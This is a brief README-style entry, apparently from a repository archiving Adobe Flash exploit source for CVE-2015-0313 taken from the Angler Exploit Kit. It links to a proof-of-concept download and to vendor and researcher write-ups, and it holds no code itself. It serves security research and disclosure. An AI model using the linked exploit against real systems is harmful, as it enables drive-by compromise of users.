+Source: https://github.com/SecurityObscurity/cve-2015-0313 + +PoC: http://www.exploit-db.com/sploits/36491.zip + +Adobe Flash vulnerability source code (cve-2015-0313) from Angler Exploit Kit + +Reference: + +http://blog.trendmicro.com/trendlabs-security-intelligence/trend-micro-discovers-new-adobe-flash-zero-day-exploit-used-in-malvertisements/ +http://malware.dontneedcoffee.com/2015/02/cve-2015-0313-flash-up-to-1600296-and.html +https://helpx.adobe.com/security/products/flash-player/apsa15-02.html